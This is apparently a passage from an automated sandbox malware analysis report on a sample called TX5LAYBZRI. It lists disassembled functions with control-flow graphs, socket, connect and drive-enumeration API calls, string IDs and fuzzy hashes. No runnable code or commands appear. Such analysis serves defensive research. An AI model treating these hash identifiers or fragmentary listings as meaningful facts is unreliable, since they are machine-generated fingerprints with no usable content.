                                            • Associated: 00000000.00000002.2138468691.0000000001469000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001576000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.000000000157A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.000000000165B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001662000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138724514.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138830242.000000000182B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138846251.000000000182D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_b90000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID: recv
                                            • String ID: LIMIT %s:%d %s reached memlimit$RECV %s:%d recv(%lu) = %ld$recv
                                            • API String ID: 1507349165-640788491
                                            • Opcode ID: a886d96987304b5ca254c8c08883433efcbfa752540051ad7004c0093751f168
                                            • Instruction ID: a067dfbce8c380ac6d6de27a3b857bca35dee2c79d315824b0fa686701aeb7cb
                                            • Opcode Fuzzy Hash: a886d96987304b5ca254c8c08883433efcbfa752540051ad7004c0093751f168
                                            • Instruction Fuzzy Hash: 521150B4A69304BBE5209721EC8EE277BDDDBC7B58F45056CB80853341DA619C01C6F2
                                            Function 00B975E0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 66networkCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1701 b975e0-b975ed 1702 b975ef-b975f6 1701->1702 1703 b97607-b97629 socket 1701->1703 1702->1703 1704 b975f8-b975ff 1702->1704 1705 b9762b-b9763c call b972a0 1703->1705 1706 b9763f-b97642 1703->1706 1708 b97601-b97602 1704->1708 1709 b97643-b97699 call b972a0 call b9cb20 call f18c50 1704->1709 1705->1706 1708->1703
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2137568261.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                            • Associated: 00000000.00000002.2137549440.0000000000B90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.0000000001170000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.00000000012D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138452275.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.00000000012DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001469000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001576000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.000000000157A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.000000000165B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001662000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138724514.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138830242.000000000182B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138846251.000000000182D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_b90000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID: socket
                                            • String ID: FD %s:%d socket() = %d$LIMIT %s:%d %s reached memlimit$socket
                                            • API String ID: 98920635-842387772
                                            • Opcode ID: 7b1d999b671596b2b81476d00673cfba342f4ec5a61bafb32ce45cc879051986
                                            • Instruction ID: 0f3047af0618cdecce29c559853e41b43322bc9f9c2c3beb1d8a9e5645145056
                                            • Opcode Fuzzy Hash: 7b1d999b671596b2b81476d00673cfba342f4ec5a61bafb32ce45cc879051986
                                            • Instruction Fuzzy Hash: 81118872A6521267EA215B7AFC0AF8B3BD9DFC3724F450568F81492382D7118892C7E1
                                            Function 00C5AA30 Relevance: 6.4, APIs: 4, Instructions: 377networkCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1719 c5aa30-c5aa64 1721 c5ab04-c5ab09 1719->1721 1722 c5aa6a-c5aaa7 call c4e730 1719->1722 1723 c5ae80-c5ae89 1721->1723 1726 c5ab0e-c5ab13 1722->1726 1727 c5aaa9-c5aabd 1722->1727 1730 c5ae2e 1726->1730 1728 c5aabf-c5aac7 1727->1728 1729 c5ab18-c5ab50 1727->1729 1728->1730 1731 c5aacd-c5ab02 1728->1731 1736 c5ab58-c5ab6d 1729->1736 1732 c5ae30-c5ae4a call c4ea60 call c4ebf0 1730->1732 1731->1736 1746 c5ae75-c5ae7d 1732->1746 1747 c5ae4c-c5ae57 1732->1747 1738 c5ab96-c5abab socket 1736->1738 1739 c5ab6f-c5ab73 1736->1739 1738->1730 1741 c5abb1-c5abc5 1738->1741 1739->1738 1742 c5ab75-c5ab8f 1739->1742 1744 c5abc7-c5abca 1741->1744 1745 c5abd0-c5abed ioctlsocket 1741->1745 1742->1741 1754 c5ab91 1742->1754 1744->1745 1750 c5ad2e-c5ad39 1744->1750 1751 c5ac10-c5ac14 1745->1751 1752 c5abef-c5ac0a 1745->1752 1746->1723 1748 c5ae6e-c5ae74 1747->1748 1749 c5ae59-c5ae5e 1747->1749 1748->1746 1749->1748 1755 c5ae60-c5ae6c 1749->1755 1759 c5ad52-c5ad56 1750->1759 1760 c5ad3b-c5ad4c 1750->1760 1756 c5ac37-c5ac41 1751->1756 1757 c5ac16-c5ac31 1751->1757 1752->1751 1762 c5ae29 1752->1762 1754->1730 1755->1746 1765 c5ac43-c5ac46 1756->1765 1766 c5ac7a-c5ac7e 1756->1766 1757->1756 1757->1762 1761 c5ad5c-c5ad6b 1759->1761 1759->1762 1760->1759 1760->1762 1769 c5ad70-c5ad78 1761->1769 1762->1730 1773 c5ad04-c5ad08 1765->1773 1774 c5ac4c-c5ac51 1765->1774 1770 c5ace7-c5acfe 1766->1770 1771 c5ac80-c5ac9b 1766->1771 1775 c5ada0-c5adb2 connect 1769->1775 1776 c5ad7a-c5ad7f 1769->1776 1770->1773 1771->1770 1777 c5ac9d-c5acc1 1771->1777 1773->1750 1778 c5ad0a-c5ad28 setsockopt 1773->1778 1774->1773 1779 c5ac57-c5ac78 1774->1779 1782 c5adb3-c5adcf 1775->1782 1776->1775 1780 c5ad81-c5ad99 1776->1780 1781 c5acc6-c5acd7 1777->1781 1778->1750 1778->1762 1779->1781 1780->1782 1781->1762 1787 c5acdd-c5ace5 1781->1787 1788 c5add5-c5add8 1782->1788 1789 c5ae8a-c5ae91 1782->1789 1787->1770 1787->1773 1790 c5ade1-c5adf1 1788->1790 1791 c5adda-c5addf 1788->1791 1789->1732 1792 c5adf3-c5ae07 1790->1792 1793 c5ae0d-c5ae12 1790->1793 1791->1769 1791->1790 1792->1793 1798 c5aea8-c5aead 1792->1798 1794 c5ae14-c5ae17 1793->1794 1795 c5ae1a-c5ae1c call c5af70 1793->1795 1794->1795 1799 c5ae21-c5ae23 1795->1799 1798->1732 1800 c5ae25-c5ae27 1799->1800 1801 c5ae93-c5ae9d 1799->1801 1800->1732 1802 c5aeaf-c5aeb1 call c4e760 1801->1802 1803 c5ae9f-c5aea6 call c4e7c0 1801->1803 1806 c5aeb6-c5aebe 1802->1806 1803->1806 1808 c5aec0-c5aedb call c4e180 1806->1808 1809 c5af1a-c5af1f 1806->1809 1808->1732 1812 c5aee1-c5aeec 1808->1812 1809->1732 1813 c5af02-c5af06 1812->1813 1814 c5aeee-c5aeff 1812->1814 1815 c5af0e-c5af15 1813->1815 1816 c5af08-c5af0b 1813->1816 1814->1813 1815->1723 1816->1815
                                            APIs
                                            • socket.WS2_32(FFFFFFFF,?,00000000), ref: 00C5AB9B
                                            • ioctlsocket.WS2_32(00000000,8004667E,00000001), ref: 00C5ABE3
                                            • setsockopt.WS2_32(?,00000006,00000001,0000001C,00000004), ref: 00C5AD20
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2137568261.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                            • Associated: 00000000.00000002.2137549440.0000000000B90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.0000000001170000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.00000000012D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138452275.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.00000000012DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001469000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001576000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.000000000157A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.000000000165B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001662000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138724514.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138830242.000000000182B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138846251.000000000182D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_b90000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID: ioctlsocketsetsockoptsocket
                                            • String ID:
                                            • API String ID: 2067140946-0
                                            • Opcode ID: 8f9312ba64eb9fac8abdb52735938b31dad9ef52728542c8c0e9cf1e79239a9a
                                            • Instruction ID: 29ae66f9a426a2c4eb1b747b490d7fc82444827156f0de7973ca6e2074e04d98
                                            • Opcode Fuzzy Hash: 8f9312ba64eb9fac8abdb52735938b31dad9ef52728542c8c0e9cf1e79239a9a
                                            • Instruction Fuzzy Hash: D5E1D2746003029BEB20CF16C885B6B77A5FF85311F144B2CFDA88B291E775D998CB96
                                            Function 0794014A Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 384COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1818 794014a-794014b 1819 7940157-7940165 1818->1819 1820 794014d 1818->1820 1823 7940178-79403b0 call 79402b7 GetLogicalDrives 1819->1823 1821 79400e7-7940165 1820->1821 1822 794014f-7940153 1820->1822 1821->1823 1822->1819 1854 79403b5-7940673 call 794042a 1823->1854
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2140470501.0000000007940000.00000040.00001000.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7940000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: A:\$A:\
                                            • API String ID: 0-1047444362
                                            • Opcode ID: b5a5358d86e243863bd3245a2a9f2f85e9a27de378b8b4f2f1c818d7117f6c15
                                            • Instruction ID: 41203dd843b86779682f4fb55fa6482a18dfddb806dd9bf6dc670fc25095763b
                                            • Opcode Fuzzy Hash: b5a5358d86e243863bd3245a2a9f2f85e9a27de378b8b4f2f1c818d7117f6c15
                                            • Instruction Fuzzy Hash: 2D71B2FB26C121BD7142C48A2B54DFB6B6DE4C7738B308CABFA07D6542E2D84E495171
                                            Function 079400E1 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 373COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1890 79400e1-79400e6 1891 79400e8-794012c 1890->1891 1892 7940139-794013d 1890->1892 1895 794013f-79403b0 call 79402b7 GetLogicalDrives 1891->1895 1892->1895 1925 79403b5-7940673 call 794042a 1895->1925
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2140470501.0000000007940000.00000040.00001000.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7940000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: A:\$A:\
                                            • API String ID: 0-1047444362
                                            • Opcode ID: 3866f239ab682270ece0913b2a0eec4b3a0a03373ed0cedab54efc93d9b24085
                                            • Instruction ID: d5b3682e76d681302973b8d221319ab8bbde726a9ce497e13565d41597967774
                                            • Opcode Fuzzy Hash: 3866f239ab682270ece0913b2a0eec4b3a0a03373ed0cedab54efc93d9b24085
                                            • Instruction Fuzzy Hash: 6971B1FB26C121BD7142C08A2B54DFB6B6DE4C7778B308CABFA07D6502E2D84E496171
                                            Function 079400D7 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 369COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1961 79400d7-79403b0 call 79402b7 GetLogicalDrives 1994 79403b5-7940673 call 794042a 1961->1994
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2140470501.0000000007940000.00000040.00001000.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7940000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID: DrivesLogical
                                            • String ID: A:\$A:\
                                            • API String ID: 999431828-1047444362
                                            • Opcode ID: 1dab1f5618d197d26c94bb2f8a52cbf8ef3c6cd753afd68970f94ee59bc24801
                                            • Instruction ID: 2481f262e62aa4084ae8083fc6e29d8f002b19535463446f9b1c09a600d17e48
                                            • Opcode Fuzzy Hash: 1dab1f5618d197d26c94bb2f8a52cbf8ef3c6cd753afd68970f94ee59bc24801
                                            • Instruction Fuzzy Hash: ED7181FB26C121BD7142C08A2B54DFB6B6DE4C7778B308CBBFA07D6542E2D84A496171
                                            Function 07940100 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 358COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 2030 7940100-79403b0 call 79402b7 GetLogicalDrives 2061 79403b5-7940673 call 794042a 2030->2061
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2140470501.0000000007940000.00000040.00001000.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7940000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID: DrivesLogical
                                            • String ID: A:\$A:\
                                            • API String ID: 999431828-1047444362
                                            • Opcode ID: de6e1fba4280ad21ef8d6a3333e287db17e955a0891b1bc422df0627b1e946c8
                                            • Instruction ID: 9ab444a411ab4b7980afa690f619e8e94f9da78e7e9bdca3ab19d61ec3265902
                                            • Opcode Fuzzy Hash: de6e1fba4280ad21ef8d6a3333e287db17e955a0891b1bc422df0627b1e946c8
                                            • Instruction Fuzzy Hash: A46192FB26C121BD7142C08A2B14DFB6B6DE4C7738B308CB7FA07D6542E2D84A496171
                                            Function 0794011A Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 350COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2140470501.0000000007940000.00000040.00001000.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7940000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID: DrivesLogical
                                            • String ID: A:\$A:\
                                            • API String ID: 999431828-1047444362
                                            • Opcode ID: 0fbc9e83fe3a6b3f47e509631b32c8764c15726efee47b2ca33038fea4b9f902
                                            • Instruction ID: 2f197a7d7905100b2cf6647202b1c58ab0a957060bdf8b985335524bb8a2beea
                                            • Opcode Fuzzy Hash: 0fbc9e83fe3a6b3f47e509631b32c8764c15726efee47b2ca33038fea4b9f902
                                            • Instruction Fuzzy Hash: A76192FB26C121BE7142C18A2B54DFB6B6DE4C7738B30CCA7FA07D6542E2D84A496171
                                            Function 07940131 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 350COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2140470501.0000000007940000.00000040.00001000.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7940000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: A:\$A:\
                                            • API String ID: 0-1047444362
                                            • Opcode ID: 57661f34ebcb76f8d0fb72d1400382dae8b58165d79560b9f618669bde19ae7d
                                            • Instruction ID: 15a7df6beff73f93052c415d04acb0dd3bcce27b1da671135716b8d2eca4da99
                                            • Opcode Fuzzy Hash: 57661f34ebcb76f8d0fb72d1400382dae8b58165d79560b9f618669bde19ae7d
                                            • Instruction Fuzzy Hash: B96191FB26C121BD7152808A2B14EFB6B6DE4C7778B30CCA7FA07D6542E2D84A496171
                                            Function 07940196 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 341COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2140470501.0000000007940000.00000040.00001000.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7940000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: A:\$A:\
                                            • API String ID: 0-1047444362
                                            • Opcode ID: f6012ff81650b22dfdbfcf3d692649d30d7eec5e2b7c69f61997c81dbd36ed88
                                            • Instruction ID: 2896202e931b4441a3241f776d0a9a12312b04f536d90a461370a7f5bf9159cc
                                            • Opcode Fuzzy Hash: f6012ff81650b22dfdbfcf3d692649d30d7eec5e2b7c69f61997c81dbd36ed88
                                            • Instruction Fuzzy Hash: 9961A3FB26C121BD7142C08A2B14EFB6B6DE4C7738B30CCA7F607D6541E2D84A496171
                                            Function 0794016A Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 340COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2140470501.0000000007940000.00000040.00001000.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7940000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID: DrivesLogical
                                            • String ID: A:\$A:\
                                            • API String ID: 999431828-1047444362
                                            • Opcode ID: d2de00377d907ea3b0424a29b93cecdde3317c8ba99c0fe8a0f8ce8630311ec1
                                            • Instruction ID: 6699aea2659326b43d91d2255e1cbaa5f0abcfe5fa408b14cd46bb9073de431b
                                            • Opcode Fuzzy Hash: d2de00377d907ea3b0424a29b93cecdde3317c8ba99c0fe8a0f8ce8630311ec1
                                            • Instruction Fuzzy Hash: E261C4FB26C121BD7142808A2B14EFB6B6DE4C7738B30CDB7F607D6542E2D84A496171
                                            Function 079401C4 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 316COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2140470501.0000000007940000.00000040.00001000.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7940000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: A:\$A:\
                                            • API String ID: 0-1047444362
                                            • Opcode ID: d70a252be531651ff0b07edc54e5d80737fda533d294c69241befcd9a929e765
                                            • Instruction ID: c7dc7d8fdf491f2956d2f0c2fe40eaff098f143cc85027afef8665e4b20cc2c9
                                            • Opcode Fuzzy Hash: d70a252be531651ff0b07edc54e5d80737fda533d294c69241befcd9a929e765
                                            • Instruction Fuzzy Hash: 4651E6F726C121BE7241819E2B54DFB6B6DE4C7738B308CBAF607D6502E2D84B496131
                                            Function 079401AB Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 311COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2140470501.0000000007940000.00000040.00001000.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7940000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID: DrivesLogical
                                            • String ID: A:\$A:\
                                            • API String ID: 999431828-1047444362
                                            • Opcode ID: 84b553553a8bc535fa1e4dd0ad3c93b94da92d952441de9c290f4a4f3dca1944
                                            • Instruction ID: 73d29ab082b78c94bd152a2c6a35cb0c32ea5593fffe0c468d7bb83321a94a8e
                                            • Opcode Fuzzy Hash: 84b553553a8bc535fa1e4dd0ad3c93b94da92d952441de9c290f4a4f3dca1944
                                            • Instruction Fuzzy Hash: AC51E7FB26C121BE7241808A2B14DFB6B6DE4C7738B308CB7F607D6502E2D44B496171
                                            Function 0794027F Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 307COMMON
                                            Download Yara Rule
                                            APIs
                                            • GetLogicalDrives.KERNELBASE(?,?,000000ED), ref: 079403B0
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2140470501.0000000007940000.00000040.00001000.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7940000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID: DrivesLogical
                                            • String ID: A:\$A:\
                                            • API String ID: 999431828-1047444362
                                            • Opcode ID: d3159692f743359826dc4f6d1786a54dd2aaadb65f94ddbf1bedce7b1b8d8db2
                                            • Instruction ID: 0f96e9bb1cfa254d750703e4df9963cf06e7dd9e48bfd5bf8ea56a045119f744
                                            • Opcode Fuzzy Hash: d3159692f743359826dc4f6d1786a54dd2aaadb65f94ddbf1bedce7b1b8d8db2
                                            • Instruction Fuzzy Hash: B351F2FB26C121BE7201819A2B54DFB6B6DE4C7338B308DABF603C6502E2D84E496171
                                            Function 079401EE Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 304COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2140470501.0000000007940000.00000040.00001000.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7940000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: A:\$A:\
                                            • API String ID: 0-1047444362
                                            • Opcode ID: ce3cd3923c8f354a64094d249a963d119f26a10246a1fbacfb0ccee4397496e8
                                            • Instruction ID: f9a48e00c67292934e1a2db198cd15778c8f8f5dcbf9d32c09139f45a71b0fc0
                                            • Opcode Fuzzy Hash: ce3cd3923c8f354a64094d249a963d119f26a10246a1fbacfb0ccee4397496e8
                                            • Instruction Fuzzy Hash: 8151C3FB16D125BE7241818A2B14EFB6A6DE4C7738B308DABF607D6502E2D80E496131
                                            Function 07940202 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 296COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2140470501.0000000007940000.00000040.00001000.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7940000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID: DrivesLogical
                                            • String ID: A:\$A:\
                                            • API String ID: 999431828-1047444362
                                            • Opcode ID: 828b5c599b2067b709f7c43b7dbf31a464602e7edce2177f1419ab63ce3a2d2d
                                            • Instruction ID: 70e3c84f538354d08fe18247a919f311958cf8ff0a5a06be986d93e69cbb2ab8
                                            • Opcode Fuzzy Hash: 828b5c599b2067b709f7c43b7dbf31a464602e7edce2177f1419ab63ce3a2d2d
                                            • Instruction Fuzzy Hash: 0F51B1FB26C121BD7241818A2B14EFB6B6DE4C7738B30CDABF607D6542E2D84A496171
                                            Function 07940222 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 289COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2140470501.0000000007940000.00000040.00001000.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7940000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID: DrivesLogical
                                            • String ID: A:\$A:\
                                            • API String ID: 999431828-1047444362
                                            • Opcode ID: 6822d4378677ce9dc9edac78d1df2dfef201313fa8d6a41a66bafc36f3e26b32
                                            • Instruction ID: 8784a746091fd4491082313535dea9c0059c05b41cf5f3bf41ac77e19e08884a
                                            • Opcode Fuzzy Hash: 6822d4378677ce9dc9edac78d1df2dfef201313fa8d6a41a66bafc36f3e26b32
                                            • Instruction Fuzzy Hash: 5B51A3FB26D121BE7241818A2B14DFB6A6DE4C7738B30CDB7F607D6502E2D84B496131
                                            Function 0794023D Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 276COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2140470501.0000000007940000.00000040.00001000.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7940000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID: DrivesLogical
                                            • String ID: A:\$A:\
                                            • API String ID: 999431828-1047444362
                                            • Opcode ID: 575fc3d12a2ecfb37253edf9f3cde22ffea437090ebd25bb7f7b66c7f15e300b
                                            • Instruction ID: 13a099d15c89752fca33f5d5478bdb1892bb4e8d4dec87364354624d79d8896c
                                            • Opcode Fuzzy Hash: 575fc3d12a2ecfb37253edf9f3cde22ffea437090ebd25bb7f7b66c7f15e300b
                                            • Instruction Fuzzy Hash: B451D6FB26C121BE7241818E2B54EFA6A6DE4C7738B308DB7F607D6502E2D84E496171
                                            Function 07940268 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 257COMMON
                                            Download Yara Rule
                                            APIs
                                            • GetLogicalDrives.KERNELBASE(?,?,000000ED), ref: 079403B0
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2140470501.0000000007940000.00000040.00001000.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7940000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID: DrivesLogical
                                            • String ID: A:\$A:\
                                            • API String ID: 999431828-1047444362
                                            • Opcode ID: ff01b65cba84aeb57380f1ae969c2797ef92ae0a3e40a676ec3c30ef5a006358
                                            • Instruction ID: f66201c9b77ca2312068f89ba0f2bb6d83ae59f5280bb7fadc0ddb21e0f7fd0b
                                            • Opcode Fuzzy Hash: ff01b65cba84aeb57380f1ae969c2797ef92ae0a3e40a676ec3c30ef5a006358
                                            • Instruction Fuzzy Hash: CB51E4FB26C121FE7241818E2B14EFA6A6DE4C7338B308DB6F607D6502E2D84F496171
                                            Function 079402C7 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 248COMMON
                                            Download Yara Rule
                                            APIs
                                            • GetLogicalDrives.KERNELBASE(?,?,000000ED), ref: 079403B0
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2140470501.0000000007940000.00000040.00001000.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7940000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID: DrivesLogical
                                            • String ID: A:\$A:\
                                            • API String ID: 999431828-1047444362
                                            • Opcode ID: 4834042a3c0283b9ad0a4794fd20c4b68eeec12e70c14f1ec7724230e8b3be95
                                            • Instruction ID: 6816148fc9b08967258a4a13c8b6b2a09bd99423b3a5c3147d4314bfeb55c279
                                            • Opcode Fuzzy Hash: 4834042a3c0283b9ad0a4794fd20c4b68eeec12e70c14f1ec7724230e8b3be95
                                            • Instruction Fuzzy Hash: 0151E5FB26C121FE6241819E2B54DFA6A6EE4C7338B308DF7F607D6502E2D84B496131
                                            Function 079402B7 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 226COMMON
                                            Download Yara Rule
                                            APIs
                                            • GetLogicalDrives.KERNELBASE(?,?,000000ED), ref: 079403B0
                                            Strings
